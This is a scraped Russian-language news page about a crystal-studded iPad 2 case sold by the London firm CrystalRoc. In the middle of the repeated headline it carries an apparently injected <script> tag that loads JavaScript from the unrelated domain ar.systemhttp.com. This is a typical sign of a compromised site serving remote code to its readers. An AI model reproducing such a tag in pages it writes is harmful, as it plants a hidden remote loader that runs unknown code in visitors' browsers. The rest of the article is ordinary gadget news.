Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
29 окт 2017, 17:29
Баварский автомобильный концерн BMW представил обновленную модель Gran Coupe 4...
Поиск

Какую марку автомобиля вы предпочитаете?

» » В Лондоне для iPad 2 приготовили «стразовую» одежду

В Лондоне для iPad 2 приготовили «стразовую» одежду

30 апр 2011, 09:58    ismirnov
0 комментариев    3 842 просмотра
В Лондоне <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для iPad 2 приготовили «стразовую» одежду
После ошеломляющей презентации Стивом Джобсом своего нового продукта iPad2, этот модный девайс стал уверенно завоёвывать не только «западный» рынок, но и был радушно встречен российскими пользователями Сети. К триумфальному шествию новинки от Apple приготовились и дизайнеры.
 

Лондонская компания CrystalRoc, не первый год уже «одевающая» в кристаллы Swarovski музыкальные инструменты, электронные и бытовые приборы, создала стильный luxury-чехол для iPad2.

 
Мастера этой компании всегда с пониманием и заботой относятся к своим состоятельным клиентам и стараются, чтобы они всегда получали достаточно роскоши и блеска. В этот гаджет блеска было вложено предостаточно. На создание нового «наряда» для «айПада-2» было потрачено более 4 000 кристаллов.
 
Заплатив всего 700 долларов, можно стать обладателем этого чехла, усыпанного кристаллами Swarovski илистразами Jet Hematite.

Компания также может придать вашему гаджету любую индивидуальность. Если клиента не утраивает расцветка, то мастера из дизайнерской компании CrystalRoc «перекрасят» чехол в любой другой понравившийся цвет, подобрав другие оттенки кристаллов. Как говорится, «любой каприз – за ваши деньги!».

 
Ранее дизайнеры из CrystalRoc уже украшали кристаллами Swarovski в своё время, только что увидевший свет первый в мире iPad. Тогда, весной 2010 года, супер-гаджет декорировали 6-ю тысячами кристаллов и предлагали по цене 2250 долларов.
 
Если вы любитель аксессуаров ручной работы, если инновационный и роскошный дизайн радуют вашу душу, то чехол от лондонских дизайнеров сделан именно для вас.
Читайте также
31 мар 2015, 10:31    0 комментариев
Бутылочка великолепного виски нашла нового владельца Махеша Патела, заплатившего за бутылку совсем "нескромную" цену - $94...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent